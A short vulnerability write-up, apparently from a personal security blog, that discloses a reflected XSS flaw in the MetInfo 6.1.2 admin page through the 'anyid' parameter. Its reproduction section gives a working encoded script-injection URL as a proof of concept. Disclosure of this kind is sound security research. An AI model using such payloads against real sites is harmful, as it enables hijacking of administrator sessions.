Xss in MetInfo V6.1.2

  1. Xss in MetInfo V6.1.2
    1. Explain
    2. Founction
    3. Reappearance

Xss in MetInfo V6.1.2

Explain

The vulnerability exists in the MetInfo6.1.2/admin/index.php page. Due to the lazy filtering of the parameter anyid, the XSS vulnerability is caused.

Founction

The affected page located in admin’s management page:MetInfo6.1.2\admin\

Reappearance

To build a website locally, first login to the website background: http://localhost/MetInfo6.1.2/admin/. After the login is successful, construct the payload:

Xss vulnerability exists

http://localhost:9096/MetInfo6.1.2/admin/index.php?lang=cn&anyid=47oaflb%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3emwq3k&n=admin&c=admin_admin&a=doadd


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:Xss in MetInfo V6.1.2

文章字数:104

本文作者:Mang0

发布时间:2018-10-16, 02:16:08

最后更新:2018-11-02, 21:52:15

原始链接:http://mang0.me/archis/a5c61176/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏